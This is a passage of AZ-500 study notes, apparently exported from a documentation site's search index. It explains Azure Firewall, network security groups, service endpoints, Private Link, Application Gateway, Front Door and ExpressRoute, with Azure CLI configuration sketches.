                            • Unrestricted cloud scalability\u00a0- Azure Firewall can scale up as much as you need, to accommodate changing network traffic flows so you don't need to budget for your peak traffic.
• Application Fully Qualified Domain Name (FQDN) filtering rules\u00a0- You can limit outbound HTTP/S traffic to a specified list of FQDNs, including wildcards. This feature does not require SSL termination.
                            • Network traffic filtering rules\u00a0- You can centrally create allow or deny network filtering rules by source and destination IP address, port, and protocol. Azure Firewall is fully stateful, so it can distinguish legitimate packets for different types of connections. Rules are enforced and logged across multiple subscriptions and virtual networks.
                            • Qualified domain tags\u00a0- Fully Qualified Domain Names (FQDN) tags make it easier for you to allow well known Azure service network traffic through your firewall. For example, say you want to allow Windows Update network traffic through your firewall. You create an application rule and include the Windows Update tag. Now network traffic from Windows Update can flow through your firewall.
                            • Outbound Source Network Address Translation (OSNAT) support\u00a0- All outbound virtual network traffic IP addresses are translated to the Azure Firewall public IP. You can identify and allow traffic originating from your virtual network to remote internet destinations.
                            • Inbound Destination Network Address Translation (DNAT) support\u00a0- Inbound network traffic to your firewall public IP address is translated and filtered to the private IP addresses on your virtual networks.
                            • Azure Monitor logging\u00a0- All events are integrated with Azure Monitor, allowing you to archive logs to a storage account, stream events to your Event Hub, or send them to Azure Monitor logs.

Flow of rules for inbound traffic: Grouping the features above into logical groups reveals that Azure Firewall has three rule types: NAT rules, network rules, and application rules. Network rules are applied first, then application rules. Rules are terminating: if a match is found in the network rules, the application rules are not processed. If there is no network rule match and the packet protocol is HTTP/HTTPS, the packet is then evaluated by the application rules. If still no match is found, the packet is evaluated against the infrastructure rule collection. If there is still no match, the packet is denied by default.

                            NAT rules - Inbound Destination Network Address Translation (DNAT). Filter inbound traffic with Azure Firewall DNAT using the Azure portal. DNAT rules are applied first. If a match is found, an implicit corresponding network rule to allow the translated traffic is added. You can override this behavior by explicitly adding a network rule collection with deny rules that match the translated traffic. No application rules are applied for these connections.

                            Network rules - Grant access from a virtual network. You can configure storage accounts to allow access only from specific VNets. You enable a service endpoint for Azure Storage within the VNet. This endpoint gives traffic an optimal route to the Azure Storage service. The identities of the virtual network and the subnet are also transmitted with each request. Administrators can then configure network rules for the storage account that allow requests to be received from specific subnets in the VNet. Each storage account supports up to 100 virtual network rules, which could be combined with IP network rules.

Application rules - Firewall rules to secure Azure Storage. When network rules are configured, only applications requesting data over the specified set of networks can access a storage account. An application that accesses a storage account when network rules are in effect still requires proper authorization on the request. Authorization is supported with Azure AD credentials for blobs and queues, a valid account access key, or a SAS token. By default, storage accounts accept connections from clients on any network. To limit access to selected networks, you must first change the default action. Making changes to network rules can impact your applications' ability to connect to Azure Storage. Setting the default network rule to Deny blocks all access to the data unless specific network rules that grant access are also applied. Be sure to grant access to any allowed networks using network rules before you change the default rule to deny access.

                            Controlling outbound and inbound network access is an important part of an overall network security plan. Network traffic is subjected to the configured firewall rules when you route your network traffic to the firewall as the default gateway.

One way you can control outbound network access from an Azure subnet is with Azure Firewall. With Azure Firewall, you can configure the following (see the sketch after this list):

                            • Application rules that define fully qualified domain names (FQDNs) that can be accessed from a subnet.
                            • Network rules that define source address, protocol, destination port, and destination address.
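
A hedged sketch of both rule types with the Azure CLI's azure-firewall extension; the firewall name, collection names, priorities, and addresses are all placeholders:

```bash
# Assumes: az extension add --name azure-firewall
# Application rule: allow outbound HTTPS to one FQDN from a workload subnet
az network firewall application-rule create \
  --resource-group MyResourceGroup \
  --firewall-name MyFirewall \
  --collection-name App-Coll01 \
  --name Allow-Contoso \
  --priority 200 \
  --action Allow \
  --source-addresses 10.0.2.0/24 \
  --protocols Https=443 \
  --target-fqdns www.contoso.com

# Network rule: allow DNS from the same subnet to a specific resolver
az network firewall network-rule create \
  --resource-group MyResourceGroup \
  --firewall-name MyFirewall \
  --collection-name Net-Coll01 \
  --name Allow-DNS \
  --priority 200 \
  --action Allow \
  --protocols UDP \
  --source-addresses 10.0.2.0/24 \
  --destination-addresses 209.244.0.3 \
  --destination-ports 53
```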

                            Fully Qualified Domain Name (FQDN) tag: An FQDN tag represents a group of fully qualified domain names (FQDNs) associated with well known Microsoft services. You can use an FQDN tag in application rules to allow the required outbound network traffic through your firewall.

                            Infrastructure qualified domain names: Azure Firewall includes a built-in rule collection for infrastructure FQDNs that are allowed by default. These FQDNs are specific for the platform and can't be used for other purposes. The following services are included in the built-in rule collection:

                            • Compute access to storage Platform Image Repository (PIR)
                            • Managed disks status storage access
                            • Azure Diagnostics and Logging (MDS)

                            You can monitor Azure Firewall using firewall logs. You can also use activity logs to audit operations on Azure Firewall resources. You can access some of these logs through the portal. Logs can be sent to Azure Monitor logs, Storage, and Event Hubs and analyzed in Azure Monitor logs or by different tools such as Excel and Power BI. Metrics are lightweight and can support near real-time scenarios making them useful for alerting and fast issue detection.

                            Threat intelligence-based filtering can be enabled for your firewall to alert and deny traffic from/to known malicious IP addresses and domains. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed. Intelligent Security Graph powers Microsoft threat intelligence and is used by multiple services including Microsoft Defender for Cloud. If you've enabled threat intelligence-based filtering, the associated rules are processed before any of the NAT rules, network rules, or application rules. You can choose to just log an alert when a rule is triggered, or you can choose alert and deny mode. By default, threat intelligence-based filtering is enabled in alert mode.

Rule processing logic: You can configure NAT rules, network rules, and application rules on Azure Firewall. Rule collections are processed according to the rule type in priority order, lower numbers to higher numbers from 100 to 65,000. A rule collection name can have only letters, numbers, underscores, periods, or hyphens. It must begin with a letter or number, and end with a letter, number, or underscore. The maximum name length is 80 characters.

                            Service tags represent a group of IP address prefixes to help minimize complexity for security rule creation. Microsoft manages the address prefixes encompassed by the service tag, and automatically updates the service tag as addresses change. Azure Firewall service tags can be used in the network rules destination field. You can use them in place of specific IP addresses.

                            Remote work support - Employees aren't protected by the layered security policies associated with on-premises services while working from home. Virtual Desktop Infrastructure (VDI) deployments on Azure can help organizations rapidly respond to this changing environment. However, you need a way to protect inbound/outbound Internet access to and from these VDI deployments. You can use Azure Firewall DNAT rules along with its threat intelligence-based filtering capabilities to protect your VDI deployments. Azure Virtual Desktop is a comprehensive desktop and app virtualization service running in Azure. It\u2019s the only virtual desktop infrastructure (VDI) that delivers simplified management, multi-session Windows 10, optimizations for Microsoft 365 ProPlus, and support for Remote Desktop Services (RDS) environments.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#14-configure-vpn-forced-tunneling","title":"1.4. Configure VPN forced tunneling","text":"

You configure forced tunneling in Azure via virtual network User Defined Routes (UDR). Redirecting traffic to an on-premises site is expressed as a default route to the Azure VPN gateway. The sketch below uses a UDR to create a routing table, first adding a default route and then associating the routing table with your virtual network subnets to enable forced tunneling on those subnets.
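
A minimal sketch of that flow, assuming the VNet already has a VPN gateway; all names are placeholders:

```bash
# Route table holding the default route to on-premises
az network route-table create \
  --resource-group MyResourceGroup \
  --name MyForcedTunnelRT

# 0.0.0.0/0 via the virtual network gateway forces traffic on-premises
az network route-table route create \
  --resource-group MyResourceGroup \
  --route-table-name MyForcedTunnelRT \
  --name DefaultToOnPrem \
  --address-prefix 0.0.0.0/0 \
  --next-hop-type VirtualNetworkGateway

# Associate the route table with a subnet to enable forced tunneling there
az network vnet subnet update \
  --resource-group MyResourceGroup \
  --vnet-name MyVnet \
  --name Frontend \
  --route-table MyForcedTunnelRT
```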

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#15-create-user-defined-routes-and-network-virtual-appliances","title":"1.5. Create User Defined Routes and Network Virtual Appliances","text":"

A User Defined Route (UDR) is a custom route in Azure that overrides Azure's default system routes or adds routes to a subnet's route table. In Azure, you create a route table and then associate that route table with zero or more virtual network subnets, as in the sketch below.
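
For a Network Virtual Appliance (NVA), the custom route typically points a destination prefix at the appliance's private IP; in this sketch the prefix and the NVA address 10.0.100.4 are assumptions:

```bash
# Steer traffic for 10.0.1.0/24 through the NVA instead of the system route
az network route-table route create \
  --resource-group MyResourceGroup \
  --route-table-name MyRouteTable \
  --name ToNva \
  --address-prefix 10.0.1.0/24 \
  --next-hop-type VirtualAppliance \
  --next-hop-ip-address 10.0.100.4
```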

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#2-network-security","title":"2. Network security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#21-network-security-groups-nsg","title":"2.1. Network Security Groups (NSG)","text":"

                            Network traffic can be filtered to and from Azure resources in an Azure virtual network with a\u00a0network security group. A network security group contains security rules that allow or deny inbound network traffic to, or outbound network traffic from, several types of Azure resources. For each rule, you can specify source and destination, port, and protocol.

                            NSGs control inbound and outbound traffic passing through a network adapter (in the Resource Manager deployment model), a VM (in the classic deployment model), or a subnet (in both deployment models).

                            Network Security Group rules

                            • Name. This is a unique identifier for the rule.
                            • Direction. This specifies whether the traffic is inbound or outbound.
                            • Priority. If multiple rules match the traffic, rules with a higher priority apply.
                            • Access. This specifies whether the traffic is allowed or denied.
                            • Source IP address prefix. This prefix identifies where the traffic originated from. It can be based on a single IP address; a range of IP addresses in Classless Interdomain Routing (CIDR) notation; or the asterisk (*), which is a wildcard that matches all possible IP addresses.
                            • Source port range. This specifies source ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
                            • Destination IP address prefix. This identifies the traffic destination based on a single IP address, a range of IP addresses in CIDR notation, or the asterisk (*) to match all possible IP addresses.
                            • Destination port range. This specifies destination ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
                            • Protocol. This specifies a protocol that matches the rule. It can be UDP, TCP, or the asterisk (*).
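
A minimal CLI sketch that exercises most of the fields above; the rule name, priority, and port are illustrative:

```bash
az network nsg create --resource-group MyResourceGroup --name MyNsg

# Inbound rule: allow HTTPS from the Internet tag, any source port,
# to any destination in the NSG's scope on port 443
az network nsg rule create \
  --resource-group MyResourceGroup \
  --nsg-name MyNsg \
  --name Allow-HTTPS-Inbound \
  --priority 310 \
  --direction Inbound \
  --access Allow \
  --protocol Tcp \
  --source-address-prefixes Internet \
  --source-port-ranges '*' \
  --destination-address-prefixes '*' \
  --destination-port-ranges 443
```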

                            Predefined default rules exist for inbound and outbound traffic. You can\u2019t delete these rules, but you can override them, because they have the lowest priority.

                            The default rules allow all inbound and outbound traffic within a virtual network, allow outbound traffic towards the internet, and allow inbound traffic to an Azure load balancer.

                            When you create a custom rule, you can use default tags in the source and destination IP address prefixes to specify predefined categories of IP addresses. These default tags are:

                            • Internet. This tag represents internet IP addresses.
                            • Virtual_network. This tag identifies all IP addresses that the IP range for the virtual network defines. It also includes IP address ranges from on-premises networks when they are defined as local network to virtual network.
                            • Azure_loadbalancer. This tag specifies the default Azure load balancer destination.

You can design NSGs to isolate virtual networks in security zones, similar to the model used by on-premises infrastructure. You can apply NSGs to subnets, which allows you to create protected screened subnets, or DMZs, that can restrict traffic flow to all the machines residing within that subnet. With the classic deployment model, you can also assign NSGs to individual computers to control traffic that is both destined for and leaving the VM. With the Resource Manager deployment model, you can assign NSGs to a network adapter so that NSG rules control only the traffic that flows through that network adapter. If the VM has multiple network adapters, NSG rules won't automatically be applied to traffic that is designated for other network adapters.

                            Network Security Group limitations

                            When implementing NSGs, these are the limits to keep in mind:

                            • By default, you can create 100 NSGs per region per subscription. You can raise this limit to 400 by contacting Azure support.
                            • You can apply only one NSG to a VM, subnet, or network adapter.
                            • By default, you can have up to 200 rules in a single NSG. You can raise this limit to 500 by contacting Azure support.
                            • You can apply an NSG to multiple resources.

                            An individual subnet can have zero, or one, associated NSG. An individual network interface can also have zero, or one, associated NSG. So, you can effectively have dual traffic restriction for a virtual machine by associating an NSG first to a subnet, and then another NSG to the VM's network interface.

                            Consider a simple example with one virtual machine as follows:

                            • The virtual machine is placed inside the Contoso Subnet.
                            • Contoso Subnet is associated with Subnet NSG.
                            • The VM network interface is additionally associated with VM NSG.

                            In this example, for inbound traffic, the Subnet NSG is evaluated first. Any traffic allowed through Subnet NSG is then evaluated by VM NSG. The reverse is applicable for outbound traffic, with VM NSG being evaluated first. Any traffic allowed through VM NSG is then evaluated by Subnet NSG.
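
The dual association from this example could be sketched as follows; the subnet, NIC, and NSG names are placeholders:

```bash
# Subnet NSG: evaluated first for inbound traffic
az network vnet subnet update \
  --resource-group MyResourceGroup \
  --vnet-name MyVnet \
  --name ContosoSubnet \
  --network-security-group SubnetNSG

# VM NSG: attached to the VM's network interface, evaluated second inbound
az network nic update \
  --resource-group MyResourceGroup \
  --name MyVmNic \
  --network-security-group VmNSG
```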

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#22-application-security-groups","title":"2.2. Application Security Groups","text":"

                            In this topic we look at Application Security Groups (ASGs), which are built on network security groups. ASGs enable you to configure network security as a natural extension of an application's structure. You then can group VMs and define network security policies based on those groups.

                            The rules that specify an ASG as the source or destination are only applied to the network interfaces that are members of the ASG. If the network interface is not a member of an ASG, the rule is not applied to the network interface even though the network security group is associated to the subnet.
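
A minimal sketch: create an ASG and reference it as the destination of an NSG rule, so the rule applies only to NICs that join the group (AsgWeb and the rule values are assumptions):

```bash
az network asg create --resource-group MyResourceGroup --name AsgWeb

# The rule only matches traffic to NICs that are members of AsgWeb
az network nsg rule create \
  --resource-group MyResourceGroup \
  --nsg-name MyNsg \
  --name Allow-Web-Inbound \
  --priority 200 \
  --direction Inbound \
  --access Allow \
  --protocol Tcp \
  --source-address-prefixes Internet \
  --destination-asgs AsgWeb \
  --destination-port-ranges 80 443
```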

Application security groups have the following constraints:

                            • There are limits to the number of ASGs you can have in a subscription, in addition to other limits related to ASGs.
                            • You can specify one ASG as the source and destination in a security rule. You cannot specify multiple ASGs in the source or destination.
                            • All network interfaces assigned to an ASG must exist in the same virtual network that the first network interface assigned to the ASG is in. For example, if the first network interface assigned to an ASG named AsgWeb is in the virtual network named VNet1, then all subsequent network interfaces assigned to ASGWeb must exist in VNet1. You cannot add network interfaces from different virtual networks to the same ASG.
                            • If you specify an ASG as the source and destination in a security rule, the network interfaces in both ASGs must exist in the same virtual network. For example, if AsgLogic contained network interfaces from VNet1, and AsgDb contained network interfaces from VNet2, you could not assign AsgLogic as the source and AsgDb as the destination in a rule. All network interfaces for both the source and destination ASGs need to exist in the same virtual network.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#23-service-endpoints","title":"2.3. Service Endpoints","text":"

                            A virtual network service endpoint provides the identity of your virtual network to the Azure service. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources.

                            Today, Azure service traffic from a virtual network uses public IP addresses as source IP addresses. With service endpoints, service traffic switches to use virtual network private addresses as the source IP addresses when accessing the Azure service from a virtual network. This switch allows you to access the services without the need for reserved, public IP addresses used in IP firewalls.
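
A sketch of enabling a storage service endpoint and then locking an account down to that subnet; the account and network names are placeholders:

```bash
# Enable the Microsoft.Storage service endpoint on the subnet
az network vnet subnet update \
  --resource-group MyResourceGroup \
  --vnet-name MyVnet \
  --name MySubnet \
  --service-endpoints Microsoft.Storage

# Deny by default, then allow only traffic from that subnet
az storage account update \
  --resource-group MyResourceGroup \
  --name mystorageacct \
  --default-action Deny

az storage account network-rule add \
  --resource-group MyResourceGroup \
  --account-name mystorageacct \
  --vnet-name MyVnet \
  --subnet MySubnet
```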

                            Why use a service endpoint?

                            • Improved security for your Azure service resources. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources. This provides improved security by fully removing public Internet access to resources, and allowing traffic only from your virtual network.
                            • Optimal routing for Azure service traffic from your virtual network. Today, any routes in your virtual network that force Internet traffic to your premises and/or virtual appliances, known as forced-tunneling, also force Azure service traffic to take the same route as the Internet traffic. Service endpoints provide optimal routing for Azure traffic.
                            • Endpoints always take service traffic directly from your virtual network to the service on the Microsoft Azure backbone network. Keeping traffic on the Azure backbone network allows you to continue auditing and monitoring outbound Internet traffic from your virtual networks, through forced-tunneling, without impacting service traffic.
                            • Simple to set up with less management overhead. You no longer need reserved, public IP addresses in your virtual networks to secure Azure resources through IP firewall. There are no NAT or gateway devices required to set up the service endpoints. Service endpoints are configured through a simple click on a subnet. There is no additional overhead to maintaining the endpoints.

                            Scenarios

                            • Peered, connected, or multiple virtual networks: To secure Azure services to multiple subnets within a virtual network or across multiple virtual networks, you can enable service endpoints on each of the subnets independently, and secure Azure service resources to all of the subnets.
• Filtering outbound traffic from a virtual network to Azure services: If you want to inspect or filter the traffic sent to an Azure service from a virtual network, you can deploy a network virtual appliance within the virtual network. You can then apply service endpoints to the subnet where the network virtual appliance is deployed, and secure Azure service resources only to this subnet. This scenario might be helpful if you want to use network virtual appliance filtering to restrict Azure service access from your virtual network to specific Azure resources only.
                            • Securing Azure resources to services deployed directly into virtual networks: You can directly deploy various Azure services into specific subnets in a virtual network. You can secure Azure service resources to managed service subnets by setting up a service endpoint on the managed service subnet.
                            • Disk traffic from an Azure virtual machine: Virtual Machine Disk traffic for managed and unmanaged disks isn't affected by service endpoints routing changes for Azure Storage. This traffic includes diskIO as well as mount and unmount. You can limit REST access to page blobs to select networks through service endpoints and Azure Storage network rules.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#24-private-links","title":"2.4. Private links","text":"

Azure Private Link works on an approval call flow model wherein the Private Link service consumer can request a connection to the service provider in order to consume the service. The service provider can then decide whether to allow the consumer to connect. Azure Private Link enables service providers to manage the private endpoint connections on their resources.

                            There are two connection approval methods that a Private Link service consumer can choose from:

                            • Automatic: If the service consumer has RBAC permissions on the service provider resource, the consumer can choose the automatic approval method. In this case, when the request reaches the service provider resource, no action is required from the service provider and the connection is automatically approved.
                            • Manual: On the contrary, if the service consumer doesn\u2019t have RBAC permissions on the service provider resource, the consumer can choose the manual approval method. In this case, the connection request appears on the service resources as Pending. The service provider has to manually approve the request before connections can be established. In manual cases, service consumer can also specify a message with the request to provide more context to the service provider.

The service provider has the following options to choose from for all Private Endpoint connections:

• Approve
                            • Reject
                            • Remove

The Azure portal is the preferred method for managing private endpoint connections on Azure PaaS resources.
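
The same flow can be driven from the CLI. A hedged sketch of a manually approved private endpoint to a storage account; $STORAGE_ID, $PENDING_CONNECTION_ID, and all names are placeholders, and the flags should be verified against your CLI version:

```bash
# Request a private endpoint; --manual-request true leaves it Pending
az network private-endpoint create \
  --resource-group MyResourceGroup \
  --name MyPrivateEndpoint \
  --vnet-name MyVnet \
  --subnet MySubnet \
  --private-connection-resource-id "$STORAGE_ID" \
  --group-id blob \
  --connection-name MyConnection \
  --manual-request true

# The service provider side then approves (or rejects/removes) the request
az network private-endpoint-connection approve \
  --id "$PENDING_CONNECTION_ID" \
  --description "Approved"
```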

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#25-azure-application-gateway","title":"2.5. Azure application gateway","text":"

                            Azure Application Gateway is a web traffic load balancer that enables you to manage traffic to your web applications. Traditional load balancers operate at the transport layer (OSI layer 4 - TCP and UDP) and route traffic based on the source IP address and port to a destination IP address and port.

                            Application Gateway can make routing decisions based on additional attributes of an HTTP request, for example, URI path or host headers. \u00a0For example, you can route traffic based on the incoming URL. So if /images are in the incoming URL, you can route traffic to a specific set of servers (known as a pool) configured for images. If /video is in the URL, that traffic is routed to another pool that's optimized for videos. This type of routing is known as application layer (OSI layer 7) load balancing.
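
A minimal provisioning sketch for a v2 gateway; the SKU, rule priority, subnet, and backend addresses are assumptions (v2 needs a dedicated subnet and a Standard public IP):

```bash
az network application-gateway create \
  --resource-group MyResourceGroup \
  --name MyAppGateway \
  --sku Standard_v2 \
  --capacity 2 \
  --vnet-name MyVnet \
  --subnet AppGwSubnet \
  --public-ip-address MyAppGwPip \
  --priority 100 \
  --servers 10.0.1.4 10.0.1.5
```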

                            Application Gateway includes the following features:

                            • Secure Sockets Layer (SSL/TLS) termination\u00a0- Application gateway supports SSL/TLS termination at the gateway, after which traffic typically flows unencrypted to the backend servers. This feature allows web servers to be unburdened from costly encryption and decryption overhead.
                            • Autoscaling\u00a0- Application Gateway Standard_v2 supports autoscaling and can scale up or down based on changing traffic load patterns. Autoscaling also removes the requirement to choose a deployment size or instance count during provisioning.
                            • Zone redundancy\u00a0- A Standard_v2 Application Gateway can span multiple Availability Zones, offering better fault resiliency and removing the need to provision separate Application Gateways in each zone.
                            • Static VIP\u00a0- The application gateway Standard_v2 SKU supports static VIP type exclusively. This ensures that the VIP associated with application gateway doesn't change even over the lifetime of the Application Gateway.
                            • Web Application Firewall\u00a0- Web Application Firewall (WAF) is a service that provides centralized protection of your web applications from common exploits and vulnerabilities. WAF is based on rules from the OWASP (Open Web Application Security Project) core rule sets 3.1 (WAF_v2 only), 3.0, and 2.2.9.
                            • Ingress Controller for AKS\u00a0- Application Gateway Ingress Controller (AGIC) allows you to use Application Gateway as the ingress for an Azure Kubernetes Service (AKS) cluster.
• URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to back-end server pools based on the URL paths of the request. One scenario is to route requests for different content types to different pools.
                            • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same application gateway instance. This feature allows you to configure a more efficient topology for your deployments by adding up to 100 web sites to one Application Gateway (for optimal performance).
                            • Redirection\u00a0- A common scenario for many web applications is to support automatic HTTP to HTTPS redirection to ensure all communication between an application and its users occurs over an encrypted path.
                            • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same server.
                            • Websocket and HTTP/2 traffic\u00a0- Application Gateway provides native support for the WebSocket and HTTP/2 protocols. There's no user-configurable setting to selectively enable or disable WebSocket support.
                            • Connection draining\u00a0- Connection draining helps you achieve graceful removal of backend pool members during planned service updates.
                            • Custom error pages\u00a0- Application Gateway allows you to create custom error pages instead of displaying default error pages. You can use your own branding and layout using a custom error page.
                            • Rewrite HTTP headers\u00a0- HTTP headers allow the client and server to pass additional information with the request or the response.
                            • Sizing\u00a0- Application Gateway Standard_v2 can be configured for autoscaling or fixed size deployments. This SKU doesn't offer different instance sizes.

                            New Application Gateway v1 SKU deployments can take up to 20 minutes to provision. Changes to instance size or count aren't disruptive, and the gateway remains active during this time.

Most deployments that use the v2 SKU take around 6 minutes to provision. However, it can take longer depending on the type of deployment. For example, deployments across multiple Availability Zones with many instances can take more than 6 minutes.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#26-web-application-firewall","title":"2.6. Web Application Firewall","text":"

                            Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. Web applications are increasingly targeted by malicious attacks that exploit commonly known vulnerabilities. SQL injection and cross-site scripting are among the most common attacks.

                            WAF can be deployed with Azure Application Gateway, Azure Front Door, and Azure Content Delivery Network (CDN) service from Microsoft. WAF on Azure CDN is currently under public preview. WAF has features that are customized for each specific service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#27-azure-front-door","title":"2.7. Azure Front Door","text":"

                            Azure Front Door enables you to define, manage, and monitor the global routing for your web traffic by optimizing for best performance and instant global failover for high availability. With Front Door, you can transform your global (multi-region) consumer and enterprise applications into robust, high-performance personalized modern applications, APIs, and content that reaches a global audience with Azure.

                            Front Door works at Layer 7 or HTTP/HTTPS layer and uses\u00a0split TCP-based anycast protocol.

                            The following features are included with Front Door:

                            • Accelerate application performance\u00a0- Using split TCP-based anycast protocol, Front Door ensures that your end users promptly connect to the nearest Front Door POP (Point of Presence).
                            • Increase application availability with smart health probes\u00a0- Front Door delivers high availability for your critical applications using its smart health probes, monitoring your backends for both latency and availability and providing instant automatic failover when a backend goes down.
                            • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to backend pools based on URL paths of the request. One of the scenarios is to route requests for different content types to different backend pools.
                            • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same Front Door configuration.
                            • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same application backend.
• TLS termination\u00a0- Front Door supports TLS termination at the edge; that is, individual users can set up a TLS connection with Front Door environments instead of establishing it over long-haul connections with the application backend.
                            • Custom domains and certificate management\u00a0- When you use Front Door to deliver content, a custom domain is necessary if you would like your own domain name to be visible in your Front Door URL.
                            • Application layer security\u00a0- Azure Front Door allows you to author custom Web Application Firewall (WAF) rules for access control to protect your HTTP/HTTPS workload from exploitation based on client IP addresses, country code, and http parameters.
                            • URL redirection\u00a0- With the strong industry push on supporting only secure communication, web applications are expected to automatically redirect any HTTP traffic to HTTPS.
                            • URL rewrite\u00a0- Front Door supports URL rewrite by allowing you to configure an optional Custom Forwarding Path to use when constructing the request to forward to the backend.
                            • Protocol support - IPv6 and HTTP/2 traffic\u00a0- Azure Front Door natively supports end-to-end IPv6 connectivity and HTTP/2 protocol.

                            As mentioned above, routing to the Azure Front Door environments leverages Anycast for both DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) traffic, so user traffic will go to the closest environment in terms of network topology (fewest hops). This architecture typically offers better round-trip times for end users (maximizing the benefits of Split TCP). Front Door organizes its environments into primary and fallback \"rings\". The outer ring has environments that are closer to users, offering lower latencies. The inner ring has environments that can handle the failover for the outer ring environment in case an issue happens. The outer ring is the preferred target for all traffic, but the inner ring is necessary to handle traffic overflow from the outer ring. In terms of VIPs (Virtual Internet Protocol addresses), each frontend host, or domain served by Front Door is assigned a primary VIP, which is announced by environments in both the inner and outer ring, as well as a fallback VIP, which is only announced by environments in the inner ring.
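
A very small provisioning sketch with the front-door CLI extension; the profile name and backend hostname are placeholders:

```bash
# Assumes: az extension add --name front-door
az network front-door create \
  --resource-group MyResourceGroup \
  --name myfrontdoorprofile \
  --backend-address myapp.azurewebsites.net
```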

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#28-expressroute","title":"2.8. ExpressRoute","text":"

                            ExpressRoute\u00a0is a direct, private connection from your WAN (not over the public Internet) to Microsoft Services, including Azure. Site-to-Site VPN traffic travels encrypted over the public Internet. Being able to configure Site-to-Site VPN and ExpressRoute connections for the same virtual network has several advantages.

                            You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute, or use Site-to-Site VPNs to connect to sites that are not part of your network, but that are connected through ExpressRoute. Notice that this configuration requires two virtual network gateways for the same virtual network, one using the gateway type 'Vpn', and the other using the gateway type 'ExpressRoute'.

                            IPsec over ExpressRoute for Virtual WAN

Azure Virtual WAN uses an Internet Protocol Security (IPsec) Internet Key Exchange (IKE) VPN connection from your on-premises network to Azure over the private peering of an Azure ExpressRoute circuit. This technique can provide an encrypted transit between the on-premises networks and Azure virtual networks over ExpressRoute, without going over the public internet or using public IP addresses. An example of this is VPN connectivity over ExpressRoute private peering.

An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths.

Point-to-point encryption by MACsec - MACsec is an IEEE standard. It encrypts data at the Media Access Control (MAC) level, or network layer 2. You can use MACsec to encrypt the physical links between your network devices and Microsoft's network devices when you connect to Microsoft via ExpressRoute Direct. MACsec is disabled on ExpressRoute Direct ports by default. You bring your own MACsec key for encryption and store it in Azure Key Vault. You decide when to rotate the key.

End-to-end encryption by IPsec and MACsec - IPsec is an IETF standard. It encrypts data at the Internet Protocol (IP) level, or network layer 3. You can use IPsec to encrypt an end-to-end connection between your on-premises network and your virtual network (VNet) on Azure. MACsec secures the physical connections between you and Microsoft. IPsec secures the end-to-end connection between you and your virtual networks on Azure. You can enable them independently.
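
A hedged sketch of enabling MACsec on an ExpressRoute Direct link, with the CAK/CKN stored in Key Vault; the secret URIs, port, and link names are placeholders, and the flags should be verified against your CLI version:

```bash
az network express-route port link update \
  --resource-group MyResourceGroup \
  --port-name MyERDirectPort \
  --name link1 \
  --macsec-ckn-secret-identifier "$CKN_SECRET_URI" \
  --macsec-cak-secret-identifier "$CAK_SECRET_URI" \
  --macsec-cipher GcmAes256
```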

ExpressRoute Direct gives you the ability to connect directly into Microsoft's global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100-Gbps or 10-Gbps connectivity, which supports Active/Active connectivity at scale.

                            Key features that ExpressRoute Direct provides include, but aren't limited to:

                            • Massive Data Ingestion into services like Storage and Cosmos DB
                            • Physical isolation for industries that are regulated and require dedicated and isolated connectivity like: Banking, Government, and Retail
                            • Granular control of circuit distribution based on business unit

                            ExpressRoute Direct supports massive data ingestion scenarios into Azure storage and other big data services. ExpressRoute circuits on 100 Gbps ExpressRoute Direct now also support 40 Gbps and 100 Gbps circuit SKUs. The physical port pairs are 100 or 10 Gbps only and can have multiple virtual circuits.

                            ExpressRoute Direct supports both QinQ and Dot1Q VLAN tagging.

                            • QinQ VLAN Tagging\u00a0allows for isolated routing domains on a per ExpressRoute circuit basis. Azure dynamically allocates an S-Tag at circuit creation and cannot be changed. Each peering on the circuit (Private and Microsoft) will utilize a unique C-Tag as the VLAN. The C-Tag is not required to be unique across circuits on the ExpressRoute Direct ports.
                            • Dot1Q VLAN Tagging\u00a0allows for a single tagged VLAN on a per ExpressRoute Direct port pair basis. A C-Tag used on a peering must be unique across all circuits and peerings on the ExpressRoute Direct port pair.

                            ExpressRoute Direct provides the same enterprise-grade SLA with Active/Active redundant connections into the Microsoft Global Network. ExpressRoute infrastructure is redundant and connectivity into the Microsoft Global Network is redundant and diverse and scales accordingly with customer requirements.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#3-host-security","title":"3. Host security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#31-endpoint-protection","title":"3.1. Endpoint protection","text":"

